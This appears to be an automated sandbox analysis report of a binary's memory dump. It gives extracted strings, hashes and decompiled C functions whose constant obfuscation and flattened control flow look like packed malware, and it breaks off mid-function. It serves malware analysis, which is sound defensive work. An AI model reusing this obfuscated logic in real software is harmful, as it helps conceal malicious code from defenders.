0), xrefs: 00255189
%, xrefs: 00255293
'v, xrefs: 00255417
|uQa, xrefs: 002551D0
t:, xrefs: 00255488
*T, xrefs: 002553F7
c, xrefs: 002556DD
p!,, xrefs: 00255708
OD, xrefs: 0025562B
r{, xrefs: 00255275
pv, xrefs: 002558B0

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: %$ c$'v$*T$0)$=i$OD$o^$p!,$pv$r{$t:$y5$|uQa
API String ID: 0-2620103065
Opcode ID: 5c64bb7974fa844b2137f81a02432e431e97beeddde5973d1e69ae1bd01462c4
Instruction ID: 69e025ec35fe163198a56d8fd5821bed43eb979d81546dac6f514b6cdfab550c
Opcode Fuzzy Hash: 5c64bb7974fa844b2137f81a02432e431e97beeddde5973d1e69ae1bd01462c4
Instruction Fuzzy Hash: 53223371508380DFE364CF25C48AA8BFBE2BBC4748F108A1DE5D9962A1D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00244A35, Relevance: 16.7, Strings: 13, Instructions: 468
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00244A35(intOrPtr __ecx, signed int __edx) {
				char _v524;
				char _v1044;
				char _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				char _v1576;
				intOrPtr _v1580;
				char _v1584;
				intOrPtr _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				unsigned int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				signed int _v1796;
				signed int _v1800;
				void* _t474;
				void* _t475;
				signed int _t479;
				signed int _t491;
				signed int _t496;
				signed int _t500;
				signed int _t510;
				signed int _t511;
				signed int _t512;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				void* _t520;
				signed int _t524;
				void* _t530;
				void* _t532;
				signed int _t572;
				signed int _t573;
				signed int _t574;
				signed int _t575;
				void* _t579;
				void* _t580;
				void* _t582;

				_v1628 = 0xed3;
				_v1628 = _v1628 + 0xd002;
				_v1628 = _v1628 ^ 0x0000defc;
				_v1796 = 0x50e8;
				_v1796 = _v1796 + 0xffffea13;
				_v1796 = _v1796 >> 0xe;
				_v1796 = _v1796 ^ 0x3dc2eaa9;
				_v1796 = _v1796 ^ 0x3dc2b05a;
				_v1604 = 0xecd0;
				_v1604 = _v1604 << 0xd;
				_v1604 = _v1604 ^ 0x1d9a54ec;
				_v1636 = 0xad8d;
				_v1636 = _v1636 >> 0xc;
				_v1636 = _v1636 ^ 0x000019e2;
				_v1600 = 0x1846;
				_v1592 = __edx;
				_t574 = 0x4762904;
				_v1588 = __ecx;
				_t510 = 0x63;
				_v1600 = _v1600 / _t510;
				_v1600 = _v1600 ^ 0x00006484;
				_v1740 = 0xfd34;
				_v1740 = _v1740 ^ 0x1b9865fd;
				_v1740 = _v1740 ^ 0xced01448;
				_v1740 = _v1740 ^ 0xd548e885;
				_v1684 = 0x582a;
				_t572 = 0x3b;
				_v1684 = _v1684 / _t572;
				_v1684 = _v1684 ^ 0x000016a0;
				_v1724 = 0x2b60;
				_t511 = 0x34;
				_v1724 = _v1724 / _t511;
				_v1724 = _v1724 ^ 0xf4396e09;
				_v1724 = _v1724 ^ 0xf4397db5;
				_v1732 = 0x220f;
				_v1732 = _v1732 ^ 0x234d952a;
				_v1732 = _v1732 >> 1;
				_v1732 = _v1732 ^ 0x11a6b27c;
				_v1616 = 0x4d57;
				_v1616 = _v1616 << 0xb;
				_v1616 = _v1616 ^ 0x026acda8;
				_v1672 = 0x3d68;
				_v1672 = _v1672 + 0xffff611f;
				_v1672 = _v1672 ^ 0xffff811c;
				_v1800 = 0xf339;
				_v1800 = _v1800 + 0xfffff0f7;
				_v1800 = _v1800 + 0x895c;
				_v1800 = _v1800 + 0xc572;
				_v1800 = _v1800 ^ 0x000271c2;
				_v1664 = 0x37c5;
				_v1664 = _v1664 + 0xffffa7ba;
				_v1664 = _v1664 ^ 0xffffa1b5;
				_v1632 = 0xc51c;
				_v1632 = _v1632 >> 4;
				_v1632 = _v1632 ^ 0x00001093;
				_v1640 = 0x76f9;
				_v1640 = _v1640 ^ 0x9fffdcc0;
				_v1640 = _v1640 ^ 0x9fff82e4;
				_v1648 = 0x8076;
				_v1648 = _v1648 * 7;
				_v1648 = _v1648 ^ 0x0003a5e4;
				_v1708 = 0x21bc;
				_v1708 = _v1708 + 0xc05f;
				_v1708 = _v1708 << 6;
				_v1708 = _v1708 ^ 0x0038a40f;
				_v1784 = 0xa89a;
				_v1784 = _v1784 / _t572;
				_v1784 = _v1784 + 0xffffeb30;
				_v1784 = _v1784 << 0xa;
				_v1784 = _v1784 ^ 0xffb86208;
				_v1656 = 0x5b43;
				_v1656 = _v1656 ^ 0xe62d1ba2;
				_v1656 = _v1656 ^ 0xe62d5436;
				_v1792 = 0x5d3e;
				_v1792 = _v1792 >> 5;
				_v1792 = _v1792 + 0xfffff433;
				_v1792 = _v1792 ^ 0x1afa5a2f;
				_v1792 = _v1792 ^ 0xe50594ef;
				_v1680 = 0x9f3f;
				_v1680 = _v1680 + 0xfffff3b1;
				_v1680 = _v1680 ^ 0x0000dcc5;
				_v1780 = 0x8a4e;
				_v1780 = _v1780 >> 0xc;
				_v1780 = _v1780 + 0x10e4;
				_v1780 = _v1780 ^ 0x817594c9;
				_v1780 = _v1780 ^ 0x81758ecd;
				_v1748 = 0xbeb1;
				_v1748 = _v1748 | 0x408b0c07;
				_v1748 = _v1748 + 0xffff7379;
				_v1748 = _v1748 ^ 0x408b5cad;
				_v1752 = 0xb76f;
				_v1752 = _v1752 >> 0xe;
				_t512 = 0x23;
				_v1752 = _v1752 / _t512;
				_v1752 = _v1752 ^ 0x000011f4;
				_v1652 = 0x783b;
				_v1652 = _v1652 ^ 0xf6ea495a;
				_v1652 = _v1652 ^ 0xf6ea4537;
				_v1788 = 0x701e;
				_v1788 = _v1788 | 0x54ae9efd;
				_v1788 = _v1788 >> 0xa;
				_v1788 = _v1788 + 0x818c;
				_v1788 = _v1788 ^ 0x0015b45a;
				_v1756 = 0xfc95;
				_t513 = 0x4e;
				_v1756 = _v1756 / _t513;
				_v1756 = _v1756 | 0x6e3e6587;
				_v1756 = _v1756 ^ 0x6e3e48c8;
				_v1720 = 0xc52f;
				_v1720 = _v1720 >> 5;
				_v1720 = _v1720 << 2;
				_v1720 = _v1720 ^ 0x00007c98;
				_v1620 = 0xf570;
				_v1620 = _v1620 >> 0xa;
				_v1620 = _v1620 ^ 0x00006ca8;
				_v1712 = 0x65f6;
				_v1712 = _v1712 | 0x8fa1cc9c;
				_v1712 = _v1712 >> 9;
				_v1712 = _v1712 ^ 0x0047fc5c;
				_v1676 = 0xb942;
				_v1676 = _v1676 * 0x15;
				_v1676 = _v1676 ^ 0x000f4c8d;
				_v1736 = 0x950a;
				_v1736 = _v1736 | 0x9f71954d;
				_v1736 = _v1736 + 0xffff5dd1;
				_v1736 = _v1736 ^ 0x9f70c3f6;
				_v1704 = 0xd0f3;
				_v1704 = _v1704 + 0xffff53c3;
				_v1704 = _v1704 ^ 0xce9fbdc0;
				_v1704 = _v1704 ^ 0xce9f87f0;
				_v1596 = 0x1518;
				_v1596 = _v1596 + 0x85a2;
				_v1596 = _v1596 ^ 0x000083d8;
				_v1668 = 0x64f;
				_v1668 = _v1668 + 0xffff0b06;
				_v1668 = _v1668 ^ 0xffff3669;
				_v1728 = 0x3b1d;
				_v1728 = _v1728 + 0x874c;
				_v1728 = _v1728 | 0x620470b3;
				_v1728 = _v1728 ^ 0x6204e551;
				_v1696 = 0x2df9;
				_v1696 = _v1696 << 0xf;
				_v1696 = _v1696 >> 4;
				_v1696 = _v1696 ^ 0x016fb4ca;
				_v1764 = 0xcc6;
				_v1764 = _v1764 | 0x8d34f989;
				_t514 = 0x74;
				_v1764 = _v1764 / _t514;
				_t515 = 0x18;
				_v1764 = _v1764 * 0x6c;
				_v1764 = _v1764 ^ 0x8377a340;
				_v1608 = 0x20b8;
				_v1608 = _v1608 + 0xffffe23d;
				_v1608 = _v1608 ^ 0x000040ba;
				_v1660 = 0xbd08;
				_v1660 = _v1660 | 0x92c929d6;
				_v1660 = _v1660 ^ 0x92c9e2c3;
				_v1644 = 0x1738;
				_v1644 = _v1644 + 0x2a2d;
				_v1644 = _v1644 ^ 0x00007d9b;
				_v1772 = 0x814c;
				_v1772 = _v1772 * 0x2f;
				_v1772 = _v1772 ^ 0x2fd35c8b;
				_v1772 = _v1772 << 9;
				_v1772 = _v1772 ^ 0x89c0ce59;
				_v1612 = 0xaccd;
				_v1612 = _v1612 << 0xb;
				_v1612 = _v1612 ^ 0x05662888;
				_v1624 = 0x6919;
				_v1624 = _v1624 >> 0xb;
				_v1624 = _v1624 ^ 0x00005c9e;
				_v1768 = 0x2455;
				_v1768 = _v1768 ^ 0xee213c0c;
				_v1768 = _v1768 + 0xffffdbe3;
				_v1768 = _v1768 >> 6;
				_v1768 = _v1768 ^ 0x03b8b908;
				_v1776 = 0x634b;
				_v1776 = _v1776 << 3;
				_v1776 = _v1776 * 0x44;
				_v1776 = _v1776 + 0xffff5e24;
				_v1776 = _v1776 ^ 0x00d21830;
				_v1688 = 0xdff8;
				_v1688 = _v1688 ^ 0x1c92e1a2;
				_v1688 = _v1688 ^ 0x1c9257de;
				_v1744 = 0xd5b6;
				_v1744 = _v1744 << 7;
				_v1744 = _v1744 ^ 0x97cdeac8;
				_v1744 = _v1744 ^ 0x97a72039;
				_v1692 = 0x89ed;
				_v1692 = _v1692 + 0xffff6a89;
				_v1692 = _v1692 | 0xb25fce0e;
				_v1692 = _v1692 ^ 0xfffff10e;
				_v1700 = 0xa1e5;
				_v1700 = _v1700 * 0x2a;
				_v1700 = _v1700 + 0xffff21dd;
				_v1700 = _v1700 ^ 0x00199ee5;
				_v1760 = 0x2165;
				_v1760 = _v1760 + 0xb9ba;
				_v1760 = _v1760 / _t515;
				_v1760 = _v1760 * 0x41;
				_v1760 = _v1760 ^ 0x000227fb;
				_v1716 = 0x5b5d;
				_v1716 = _v1716 | 0x7b7605fc;
				_v1716 = _v1716 >> 5;
				_v1716 = _v1716 ^ 0x03cbb2ff;
				_t474 = E00256D44(_t515);
				_t573 = _v1592;
				_t579 = _t474;
				_t508 = _v1592;
				while(1) {
					L1:
					_t475 = 0x1359b45f;
					do {
						while(1) {
							L2:
							_t582 = _t574 - 0x1dbe7493;
							if(_t582 > 0) {
								break;
							}
							if(_t582 == 0) {
								return E0024F536(_v1692, _v1700, _v1760, _t573);
							}
							if(_t574 != 0x4762904) {
								if(_t574 == 0x589c6e4) {
									E0024F536(_v1644, _v1772, _v1612, _t508);
									_pop(_t524);
									_t574 = 0x1e3f4be6;
									while(1) {
										L1:
										_t475 = 0x1359b45f;
										goto L2;
									}
								} else {
									if(_t574 == 0xb2e7f16) {
										_t524 = _v1748;
										_t500 = E00251773(_v1752, _v1584, _v1580, _v1652, _v1788);
										_t508 = _t500;
										_t580 = _t580 + 0x10;
										__eflags = _t500;
										_t475 = 0x1359b45f;
										_t574 =  !=  ? 0x1359b45f : 0x1e3f4be6;
										continue;
									} else {
										if(_t574 == 0xbe4541e) {
											_push(_t524);
											_push(_v1660);
											_push(0);
											_push(_v1608);
											_push(0);
											_push(_v1764);
											_t524 = _v1696;
											_push( &_v1564);
											E0024568E(_t524, 1);
											_t580 = _t580 + 0x1c;
											_t574 = 0x589c6e4;
											while(1) {
												L1:
												_t475 = 0x1359b45f;
												goto L2;
											}
										} else {
											if(_t574 == _t475) {
												_push(_v1720);
												E002429E3( &_v524, 0x104, E0025889D(0x25c8a0, _v1756, __eflags), _v1620, _v1712, _v1676, _t508,  &_v1564, _v1736, _v1704);
												_t580 = _t580 + 0x24;
												E00252025(_v1596, _t503, _v1668, _v1728);
												_pop(_t524);
												_t574 = 0xbe4541e;
												while(1) {
													L1:
													_t475 = 0x1359b45f;
													goto L2;
												}
											} else {
												if(_t574 != 0x1d7e83db) {
													goto L29;
												} else {
													E00254F7D(_v1688, _v1744, _v1576);
													_pop(_t524);
													_t574 = 0x3025b1cf;
													while(1) {
														L1:
														_t475 = 0x1359b45f;
														goto L2;
													}
												}
											}
										}
									}
								}
								L23:
								return _t496;
							}
							_push(_t524);
							_t530 = 0x38;
							_t496 = E00248736(_t530);
							_t573 = _t496;
							_t532 = _t524;
							__eflags = _t573;
							if(_t573 != 0) {
								_push(_t532);
								_push(_t532);
								_t524 = _v1684;
								E0024C6C7(_t524, _v1724,  &_v1044, _t532, _v1732, _v1628, _v1616);
								_t580 = _t580 + 0x1c;
								_t574 = 0x2d0f1252;
								while(1) {
									L1:
									_t475 = 0x1359b45f;
									goto L2;
								}
							}
							goto L23;
						}
						__eflags = _t574 - 0x1e3f4be6;
						if(_t574 == 0x1e3f4be6) {
							E0024F536(_v1624, _v1768, _v1776, _v1584);
							_t574 = 0x1d7e83db;
							_t475 = 0x1359b45f;
							goto L29;
						} else {
							__eflags = _t574 - 0x20ae1a02;
							if(_t574 == 0x20ae1a02) {
								_v1572 = E0025388A();
								_t479 = E00250ADC(_t478, _v1800, _v1664);
								_pop(_t520);
								_v1568 = 2 + _t479 * 2;
								E0024B35D(_t579, _t579, _v1632,  &_v1576, _t520, _v1640, _v1648, _t579, _v1708, _v1784, _v1656, _v1716, _v1792);
								_t580 = _t580 + 0x30;
								asm("sbb esi, esi");
								_t575 = _t574 & 0x097497a8;
								goto L25;
							} else {
								__eflags = _t574 - 0x27330c3b;
								if(_t574 == 0x27330c3b) {
									E002480BA( &_v1576, _v1680, _v1780,  &_v1584);
									asm("sbb esi, esi");
									_pop(_t524);
									_t574 = (_t574 & 0xedaffb3b) + 0x1d7e83db;
									goto L1;
								} else {
									__eflags = _t574 - 0x2d0f1252;
									if(_t574 == 0x2d0f1252) {
										_push( &_v524);
										E002488E5(_v1588, _v1592);
										asm("sbb esi, esi");
										_t524 = 0x25c8f0;
										_t575 = _t574 & 0x02efa56f;
										__eflags = _t575;
										L25:
										_t574 = _t575 + 0x1dbe7493;
										while(1) {
											L1:
											_t475 = 0x1359b45f;
											goto L2;
										}
									} else {
										__eflags = _t574 - 0x3025b1cf;
										if(_t574 == 0x3025b1cf) {
											 *((intOrPtr*)(_t573 + 0x24)) = _v1588;
											_t491 =  *0x25ca24; // 0x0
											 *(_t573 + 0x2c) = _t491;
											 *0x25ca24 = _t573;
											return _t491;
										}
										goto L29;
									}
								}
							}
						}
						goto L23;
						L29:
						__eflags = _t574 - 0x15e8ba90;
					} while (__eflags != 0);
					return _t475;
				}
			}

0x00244a3b
0x00244a46
0x00244a51
0x00244a5c
0x00244a64
0x00244a6c
0x00244a71
0x00244a79
0x00244a81
0x00244a8c
0x00244a94
0x00244a9f
0x00244aaa
0x00244ab2
0x00244abd
0x00244ad3
0x00244ada
0x00244ae3
0x00244aea
0x00244aef
0x00244af8
0x00244b03
0x00244b0b
0x00244b13
0x00244b1b
0x00244b23
0x00244b35
0x00244b3a
0x00244b43
0x00244b4e
0x00244b5a
0x00244b5d
0x00244b61
0x00244b69
0x00244b71
0x00244b79
0x00244b81
0x00244b85
0x00244b8d
0x00244b98
0x00244ba0
0x00244bab
0x00244bb6
0x00244bc1
0x00244bcc
0x00244bd4
0x00244bdc
0x00244be4
0x00244bec
0x00244bf4
0x00244bff
0x00244c0a
0x00244c15
0x00244c20
0x00244c28
0x00244c33
0x00244c3e
0x00244c49
0x00244c54
0x00244c67
0x00244c6e
0x00244c79
0x00244c81
0x00244c89
0x00244c8e
0x00244c98
0x00244ca8
0x00244cae
0x00244cb6
0x00244cbb
0x00244cc3
0x00244cce
0x00244cd9
0x00244ce4
0x00244cec
0x00244cf1
0x00244cf9
0x00244d01
0x00244d09
0x00244d14
0x00244d1f
0x00244d2a
0x00244d32
0x00244d37
0x00244d3f
0x00244d47
0x00244d4f
0x00244d57
0x00244d5f
0x00244d67
0x00244d6f
0x00244d77
0x00244d80
0x00244d85
0x00244d8b
0x00244d93
0x00244d9e
0x00244da9
0x00244db4
0x00244dbc
0x00244dc4
0x00244dc9
0x00244dd1
0x00244dd9
0x00244de5
0x00244de8
0x00244dec
0x00244df4
0x00244dfc
0x00244e04
0x00244e09
0x00244e0e
0x00244e16
0x00244e21
0x00244e29
0x00244e34
0x00244e3c
0x00244e44
0x00244e49
0x00244e51
0x00244e64
0x00244e6b
0x00244e76
0x00244e7e
0x00244e86
0x00244e8e
0x00244e96
0x00244e9e
0x00244ea6
0x00244eae
0x00244eb6
0x00244ec1
0x00244ecc
0x00244ed7
0x00244ee4
0x00244eef
0x00244efa
0x00244f02
0x00244f0a
0x00244f12
0x00244f1a
0x00244f22
0x00244f27
0x00244f2c
0x00244f34
0x00244f3c
0x00244f4a
0x00244f4f
0x00244f5a
0x00244f5b
0x00244f5f
0x00244f67
0x00244f72
0x00244f7d
0x00244f88
0x00244f93
0x00244f9e
0x00244fa9
0x00244fb4
0x00244fbf
0x00244fca
0x00244fd7
0x00244fdb
0x00244fe3
0x00244fe8
0x00244ff0
0x00244ffb
0x00245003
0x0024500e
0x00245019
0x00245021
0x0024502c
0x00245034
0x0024503c
0x00245044
0x00245049
0x00245051
0x00245059
0x00245063
0x00245067
0x0024506f
0x00245077
0x00245082
0x0024508d
0x00245098
0x002450a0
0x002450a5
0x002450ad
0x002450b5
0x002450c0
0x002450cb
0x002450d6
0x002450e1
0x002450ee
0x002450f2
0x002450fa
0x00245102
0x0024510a
0x00245118
0x00245121
0x00245125
0x0024512d
0x00245135
0x0024513d
0x00245142
0x00245155
0x0024515a
0x00245161
0x00245163
0x0024516a
0x0024516a
0x0024516a
0x0024516f
0x0024516f
0x0024516f
0x0024516f
0x00245175
0x00000000
0x00000000
0x0024517b
0x00000000
0x002454f8
0x00245187
0x00245193
0x002452e9
0x002452ef
0x002452f0
0x0024516a
0x0024516a
0x0024516a
0x00000000
0x0024516a
0x00245199
0x0024519f
0x002452ad
0x002452b8
0x002452bd
0x002452bf
0x002452c2
0x002452c9
0x002452ce
0x00000000
0x002451a5
0x002451ab
0x0024525c
0x0024525d
0x0024526d
0x0024526f
0x00245277
0x00245279
0x0024527d
0x00245284
0x00245285
0x0024528a
0x0024528d
0x0024516a
0x0024516a
0x0024516a
0x00000000
0x0024516a
0x002451b1
0x002451b3
0x002451e0
0x0024522f
0x00245234
0x0024524b
0x00245251
0x00245252
0x0024516a
0x0024516a
0x0024516a
0x00000000
0x0024516a
0x002451b5
0x002451bb
0x00000000
0x002451c1
0x002451d3
0x002451d8
0x002451d9
0x0024516a
0x0024516a
0x0024516a
0x00000000
0x0024516a
0x0024516a
0x002451bb
0x002451b3
0x002451ab
0x0024519f
0x002453b2
0x002453b2
0x002453b2
0x0024530c
0x00245310
0x00245311
0x00245316
0x00245319
0x0024531a
0x0024531c
0x00245322
0x00245323
0x00245342
0x0024534a
0x0024534f
0x00245352
0x0024516a
0x0024516a
0x0024516a
0x00000000
0x0024516a
0x0024516a
0x00000000
0x0024531c
0x0024535c
0x00245362
0x002454bd
0x002454c4
0x002454c9
0x00000000
0x00245368
0x00245368
0x0024536e
0x00245439
0x00245440
0x00245445
0x0024545c
0x00245490
0x00245495
0x0024549a
0x0024549c
0x00000000
0x00245374
0x00245374
0x0024537a
0x00245404
0x0024540c
0x00245414
0x00245415
0x00000000
0x0024537c
0x0024537c
0x00245382
0x002453c8
0x002453ce
0x002453d6
0x002453d8
0x002453d9
0x002453d9
0x002453df
0x002453df
0x0024516a
0x0024516a
0x0024516a
0x00000000
0x0024516a
0x00245384
0x00245384
0x0024538a
0x00245397
0x0024539a
0x0024539f
0x002453a2
0x00000000
0x002453a2
0x00000000
0x0024538a
0x00245382
0x0024537a
0x0024536e
0x00000000
0x002454ce
0x002454ce
0x002454ce
0x00000000
0x0024516f

Strings

WM, xrefs: 00244B8D
>], xrefs: 00244CE4
][, xrefs: 0024512D
U$, xrefs: 0024502C
`+, xrefs: 00244B4E
6T-, xrefs: 00244CD9
Kc, xrefs: 00245051
;x, xrefs: 00244D93
e!, xrefs: 00245102
-*, xrefs: 00244FB4
h=, xrefs: 00244BAB
P, xrefs: 00244A5C
*X, xrefs: 00244B23

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: *X$-*$6T-$;x$>]$Kc$U$$WM$][$`+$e!$h=$P
API String ID: 0-2931794159
Opcode ID: ea925dc76893ccb5cb2c7e52d7c307a7d969efb92a54c02c09804a1f94241616
Instruction ID: ed611421706203c0d9668563cf6b4d05cf3a3f7edf2a60c58a221aecb1ff81b1
Opcode Fuzzy Hash: ea925dc76893ccb5cb2c7e52d7c307a7d969efb92a54c02c09804a1f94241616
Instruction Fuzzy Hash: 02322271518781CFE3B8CF25C54AA8BBBE1BBC4304F508A1DE5DA962A0D7B59819CF03

Uniqueness

Uniqueness Score: -1.00%

Function 00248F78, Relevance: 15.4, Strings: 12, Instructions: 367
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E00248F78(intOrPtr __ecx, intOrPtr __edx) {
				char _v524;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				unsigned int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				void* _t354;
				intOrPtr _t355;
				intOrPtr _t359;
				void* _t362;
				void* _t367;
				void* _t378;
				intOrPtr _t383;
				signed int _t386;
				signed int _t387;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				void* _t394;
				void* _t395;
				signed int _t401;
				signed int _t435;
				intOrPtr _t444;
				signed int _t445;
				intOrPtr _t449;
				signed int* _t450;
				void* _t452;

				_t450 =  &_v684;
				_v548 = _v548 & 0x00000000;
				_v652 = 0x628b;
				_v652 = _v652 | 0x8ea8a6c3;
				_v652 = _v652 >> 8;
				_v652 = _v652 ^ 0x078a89dd;
				_v652 = _v652 ^ 0x0504213b;
				_v656 = 0xca44;
				_v656 = _v656 << 3;
				_v656 = _v656 >> 0xa;
				_v656 = _v656 | 0x073c6a17;
				_v656 = _v656 ^ 0x073c621f;
				_v664 = 0x16e0;
				_v664 = _v664 + 0xffffe980;
				_v664 = _v664 >> 8;
				_v544 = __edx;
				_t449 = __ecx;
				_t445 = 0x351028fa;
				_t386 = 0x6c;
				_v664 = _v664 / _t386;
				_v664 = _v664 ^ 0x00007066;
				_v640 = 0x836e;
				_v640 = _v640 + 0xb501;
				_v640 = _v640 >> 2;
				_v640 = _v640 ^ 0x000012b9;
				_v628 = 0xb2ec;
				_t387 = 0x41;
				_v628 = _v628 * 0x46;
				_v628 = _v628 + 0xd97;
				_v628 = _v628 ^ 0x0030acaf;
				_v576 = 0x565d;
				_v576 = _v576 | 0xc8c85e8e;
				_v576 = _v576 ^ 0xc8c86b89;
				_v560 = 0xfa05;
				_v560 = _v560 + 0x1743;
				_v560 = _v560 ^ 0x00015cb0;
				_v588 = 0x54a3;
				_v588 = _v588 ^ 0x711a4c60;
				_v588 = _v588 << 6;
				_v588 = _v588 ^ 0x46864cc2;
				_v596 = 0xba14;
				_v596 = _v596 + 0xf2e8;
				_v596 = _v596 + 0x1be7;
				_v596 = _v596 ^ 0x00019f0a;
				_v660 = 0x9a1f;
				_v660 = _v660 / _t387;
				_t388 = 0x56;
				_v660 = _v660 * 0x79;
				_v660 = _v660 << 0xd;
				_v660 = _v660 ^ 0x23dca07a;
				_v676 = 0x17dc;
				_v676 = _v676 << 0xe;
				_v676 = _v676 / _t388;
				_v676 = _v676 + 0xffffccb5;
				_v676 = _v676 ^ 0x0011ad2d;
				_v636 = 0xbd70;
				_v636 = _v636 | 0x80fc5ede;
				_v636 = _v636 << 4;
				_v636 = _v636 ^ 0x0fcfa70d;
				_v608 = 0xbaf8;
				_v608 = _v608 + 0xffff1119;
				_t389 = 0x27;
				_v608 = _v608 / _t389;
				_v608 = _v608 ^ 0x06904b29;
				_v684 = 0xf49f;
				_t390 = 0x66;
				_v684 = _v684 * 0x1f;
				_v684 = _v684 + 0xffffe502;
				_v684 = _v684 / _t390;
				_v684 = _v684 ^ 0x00005c32;
				_v668 = 0xe410;
				_v668 = _v668 >> 0xc;
				_v668 = _v668 + 0xffffc634;
				_v668 = _v668 << 0xf;
				_v668 = _v668 ^ 0xe3216c4d;
				_v620 = 0x7d49;
				_t391 = 0x24;
				_v620 = _v620 * 0x1a;
				_v620 = _v620 ^ 0x980c0cc6;
				_v620 = _v620 ^ 0x9800e7e7;
				_v564 = 0x5c7e;
				_v564 = _v564 ^ 0x14aa654c;
				_v564 = _v564 ^ 0x14aa562a;
				_v552 = 0x450c;
				_v552 = _v552 << 7;
				_v552 = _v552 ^ 0x0022b9f7;
				_v580 = 0x3573;
				_v580 = _v580 >> 0xe;
				_v580 = _v580 / _t391;
				_v580 = _v580 ^ 0x000007cd;
				_v584 = 0x18cc;
				_v584 = _v584 >> 0xe;
				_v584 = _v584 << 3;
				_v584 = _v584 ^ 0x000042dd;
				_v556 = 0x1e9b;
				_v556 = _v556 + 0xffff5daa;
				_v556 = _v556 ^ 0xffff6e35;
				_v568 = 0x1617;
				_v568 = _v568 << 4;
				_v568 = _v568 ^ 0x000112eb;
				_v572 = 0xca92;
				_v572 = _v572 + 0x7b62;
				_v572 = _v572 ^ 0x00017fbb;
				_v592 = 0xd72f;
				_v592 = _v592 | 0xe23ccaf6;
				_v592 = _v592 + 0x7d96;
				_v592 = _v592 ^ 0xe23d11e5;
				_v644 = 0x4340;
				_t392 = 7;
				_v644 = _v644 * 0x73;
				_v644 = _v644 | 0x11b8a473;
				_v644 = _v644 ^ 0x11bec66f;
				_v672 = 0x4860;
				_v672 = _v672 / _t392;
				_v672 = _v672 | 0x7c31fb12;
				_v672 = _v672 ^ 0x5cc3fc4f;
				_v672 = _v672 ^ 0x20f228b2;
				_v680 = 0x617d;
				_v680 = _v680 >> 0xd;
				_v680 = _v680 | 0xd7e9f895;
				_v680 = _v680 ^ 0xd7e9e095;
				_v616 = 0xec2d;
				_v616 = _v616 + 0xebc9;
				_v616 = _v616 ^ 0x6282d746;
				_v616 = _v616 ^ 0x6283789e;
				_v600 = 0x3147;
				_v600 = _v600 >> 0xe;
				_t393 = 0x4c;
				_t383 = _v544;
				_t444 = _v544;
				_v600 = _v600 * 0x6d;
				_v600 = _v600 ^ 0x000035af;
				_v604 = 0xdf1e;
				_v604 = _v604 >> 0xa;
				_v604 = _v604 + 0xffffe311;
				_v604 = _v604 ^ 0xffffd288;
				_v612 = 0xd6ea;
				_v612 = _v612 << 0xc;
				_v612 = _v612 * 0x1c;
				_v612 = _v612 ^ 0x7819f753;
				_v624 = 0x23;
				_v624 = _v624 >> 6;
				_v624 = _v624 ^ 0x0e47f934;
				_v624 = _v624 ^ 0x0e47f086;
				_v632 = 0x3384;
				_v632 = _v632 >> 9;
				_v632 = _v632 / _t393;
				_v632 = _v632 ^ 0x000059c8;
				_v648 = 0x4bab;
				_v648 = _v648 * 0x33;
				_v648 = _v648 ^ 0xea23b576;
				_v648 = _v648 | 0x057acb41;
				_v648 = _v648 ^ 0xef7effc2;
				while(1) {
					L1:
					_t354 = 0x2d3a08fe;
					while(1) {
						L2:
						_t394 = 0x2432fb60;
						do {
							while(1) {
								L3:
								_t452 = _t445 - _t394;
								if(_t452 > 0) {
									break;
								}
								if(_t452 == 0) {
									_push( &_v524);
									_push(_t394);
									_t367 = E0024BB3A(_v684, _v668, _t394, _v548, _v620,  &_v540, _v564);
									_t450 =  &(_t450[7]);
									if(_t367 != 0) {
										E00254F7D(_v552, _v580, _v540);
										E00254F7D(_v584, _v556, _v536);
									}
									_t435 = _v572;
									_push(_v548);
									_t401 = _v568;
									L21:
									E00254F7D(_t401, _t435);
									L22:
									_t445 = 0x2e38c466;
									while(1) {
										L1:
										_t354 = 0x2d3a08fe;
										goto L2;
									}
								} else {
									if(_t445 == 0xd57030c) {
										return E0024F536(_v624, _v632, _v648, _t444);
									}
